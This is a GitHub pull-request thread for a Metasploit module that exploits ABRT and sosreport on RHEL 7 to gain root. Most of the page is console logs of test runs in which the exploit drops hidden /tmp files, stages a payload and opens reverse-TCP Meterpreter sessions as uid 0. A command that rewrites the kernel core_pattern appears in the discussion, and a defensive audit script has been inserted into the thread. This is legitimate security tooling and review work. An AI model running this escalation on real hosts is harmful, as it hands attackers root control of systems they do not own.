Add ABRT sosreport Privilege Escalation module #11762

Merged
merged 4 commits into from
Sep 24, 2019

Conversation

bcoles
Contributor

@bcoles bcoles commented Apr 20, 2019

Lazy wrapper for rebel's sosreport-rhel7.py exploit.

Red Hat Enterprise Linux 7.0 (x64)

msf5 > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-12.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.DcxBT2w' (2756 bytes) ...
[*] Writing '/tmp/.HUAWYz' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.151
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.151:50843) at 2019-04-20 07:21:24 -0400
[+] Deleted /tmp/.DcxBT2w
[+] Deleted /tmp/.HUAWYz
[+] Deleted /tmp/hax.sh
[*] waiting for sosreport to finish (can take several minutes)....................

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-123.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

Red Hat Enterprise Linux 7.1 (x64)

msf5 > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.gFrwiGr' (2756 bytes) ...
[*] Writing '/tmp/.NA4fwK' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.218
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.218:51022) at 2019-04-20 07:23:24 -0400
[*] waiting for sosreport to finish (can take several minutes)..............

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

@wchen-r7
Contributor

I'm looking for Redhat 7.1 but it seems their website only provides 7.2 at the minimum... could you please find me a link for 7.1?

@bcoles
Contributor Author

bcoles commented May 24, 2019

I'm looking for Redhat 7.1 but it seems their website only provides 7.2 at the minimum... could you please find me a link for 7.1?

You'll need to sign up as a Red Hat developer, auth to SSO, and then navigate to the correct portal. This can be achieved in 47 simple steps.

No rush. I'll need to address the above issue before this lands.

@bcoles bcoles added the blocked Blocked by one or more additional tasks label May 24, 2019
@wchen-r7
Contributor

47 steps!? Wow it's almost like they don't want you to get it.

@bcoles
Contributor Author

bcoles commented May 24, 2019

47 steps!? Wow it's almost like they don't want you to get it.

  1. Go here: https://access.redhat.com/downloads/content/69/
  2. Login
  3. Select 7.1 from the drop down
  4. Select RHEL 7.1 Binary DVD

Edit: [not shown above: the 43 steps required to register and find that link]

@wchen-r7
Contributor

Thank you.

@bcoles bcoles removed the blocked Blocked by one or more additional tasks label May 29, 2019
@bwatters-r7
Contributor

FWIW, the changes work as expected, though this is not vulnerable:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] Sending stage (3021284 bytes) to 192.168.134.103
[*] Meterpreter session 1 opened (192.168.135.168:4567 -> 192.168.134.103:57530) at 2019-06-03 16:26:14 -0500

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[*] ABRT package version 2.1.11-52.el7.centos is not vulnerable
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > 

I'm downloading a CentOS 7.0 iso right now and will try that tomorrow if this is still up.

@bcoles
Contributor Author

bcoles commented Jun 3, 2019

I'm downloading a CentOS 7.0 iso right now and will try that tomorrow if this is still up.

You'll need RHEL, not CentOS.

@h00die
Contributor

h00die commented Jul 17, 2019

Is ABRT the default? I have a 7.1 server x64 VM, and at least on it I got "System is not configured to use ABRT for crash reporting"
Re-installing my 7.0 server to check it

@bcoles
Contributor Author

bcoles commented Jul 17, 2019

Is ABRT the default? I have a 7.1 server x64 VM, and at least on it I got "System is not configured to use ABRT for crash reporting"
Re-installing my 7.0 server to check it

I believe so. That seems like the kind of thing I would have documented if it weren't default.

Both my RHEL 7.0 and RHEL 7.1 had ABRT configured as the crash handler.

I checked the shell history on both test boxes and found no indication that I'd changed the core pattern.

The advisory also indicates that it is the default crash handler:

A can be used to elevate privileges from an unprivileged user to root
on a default installation of RHEL 7/7.1. RHEL 6 and lower do not seem
vulnerable by default.

Changing the core_pattern is easy if you want to check the vulnerability:

echo "|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e" > /proc/sys/kernel/core_pattern

But my guess is that your RHEL 7.1 system is likely not vulnerable, as 7.1 was released on 2015-03-05 and the bug was dropped about 6 months later on 2015-11-23. If you've installed updates any time in the last 4 years it will be patched.
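Added example, not code from this PR or from the Metasploit module: a small POSIX shell audit that checks the same pre-conditions the module's `check` output reports (core dumps piped to `abrt-hook-ccpp`, the `abrt-ccpp` service active, the installed `abrt` package version), so an administrator can confirm the exposure of a host without running the exploit. The function names, the `--live` flag and the `FIXED_VR` placeholder are assumptions; the first fixed version-release is not stated on this page and must be taken from the vendor advisory for your distribution.

```shell
#!/bin/sh
# Added audit helper; not part of the Metasploit module or this PR.
# It reproduces the observations the module prints before exploiting
# (core_pattern, abrt-ccpp state, abrt package version) and reduces them
# to one verdict. FIXED_VR is a placeholder: fill it from your vendor's
# advisory, this script assumes no particular fixed version.

# Returns 0 when a core_pattern string pipes core dumps to abrt-hook-ccpp,
# i.e. the state the module reports as "configured to use ABRT".
core_pattern_uses_abrt() {
  case "$1" in
    '|'*abrt-hook-ccpp*) return 0 ;;
    *) return 1 ;;
  esac
}

# Compare two RPM version-release strings; prints lt, eq or gt for $1 vs $2.
# Relies on GNU sort -V, which orders dotted numeric segments numerically.
vr_cmp() {
  if [ "$1" = "$2" ]; then
    echo eq
    return
  fi
  if [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]; then
    echo lt
  else
    echo gt
  fi
}

# Summarise exposure from four inputs:
#   $1 core_pattern contents   $2 abrt-ccpp state ("active"/"inactive")
#   $3 installed abrt version-release   $4 first fixed version-release
# Prints one of: not-abrt, abrt-ccpp-stopped, patched, exposed
abrt_audit() {
  core_pattern_uses_abrt "$1" || { echo not-abrt; return; }
  [ "$2" = active ] || { echo abrt-ccpp-stopped; return; }
  if [ "$(vr_cmp "$3" "$4")" = lt ]; then
    echo exposed
  else
    echo patched
  fi
}

# Collect the same observations from the running host. Only runs when the
# script is invoked with --live, so sourcing it for its functions has no
# side effects.
if [ "${1:-}" = "--live" ]; then
  FIXED_VR="${FIXED_VR:?set FIXED_VR to the first fixed abrt version-release from your vendor advisory}"
  pattern=$(cat /proc/sys/kernel/core_pattern)
  state=$(systemctl is-active abrt-ccpp 2>/dev/null)
  state=${state:-inactive}
  ver=$(rpm -q --qf '%{VERSION}-%{RELEASE}' abrt 2>/dev/null || echo unknown)
  echo "core_pattern: $pattern"
  echo "abrt-ccpp:    $state"
  echo "abrt:         $ver"
  echo "result:       $(abrt_audit "$pattern" "$state" "$ver" "$FIXED_VR")"
fi
```

Usage on a host: `FIXED_VR=<fixed-version-release> sh abrt_audit.sh --live`. A result of `not-abrt` means the kernel is not handing core dumps to ABRT at all (the reason h00die's 7.1 VM was reported as not configured), `abrt-ccpp-stopped` means the hook is installed but the service is down, and only a `exposed` verdict combines the three conditions the module requires.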

@space-r7 space-r7 self-assigned this Sep 24, 2019
@space-r7
Contributor

Successfully tested against RHEL 7.1:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (985320 bytes) to 192.168.37.163
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.163:58254) at 2019-09-24 09:23:15 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > check

[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] The target appears to be vulnerable.
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.Zw6rGJ2' (2756 bytes) ...
[*] Writing '/tmp/.38QS1nWv' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 192.168.37.163
[*] waiting for sosreport to finish (can take several minutes)......................................................................
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.163:58255) at 2019-09-24 09:25:52 -0500
[+] Deleted /tmp/.38QS1nWv
[+] Deleted /tmp/hax.sh

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

space-r7 added a commit that referenced this pull request Sep 24, 2019
@space-r7 space-r7 merged commit ca8c72d into rapid7:master Sep 24, 2019
msjenkins-r7 pushed a commit that referenced this pull request Sep 24, 2019
@space-r7
Contributor

Release Notes

This adds a module that attempts to gain root privileges through a symlink attack by exploiting the Automatic Bug Reporting Tool (ABRT) before v2.7.1.

@bcoles bcoles deleted the abrt_sosreport_priv_esc branch September 25, 2019 06:42
@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 30, 2019
Labels
docs module rn-modules release notes for new or majorly enhanced modules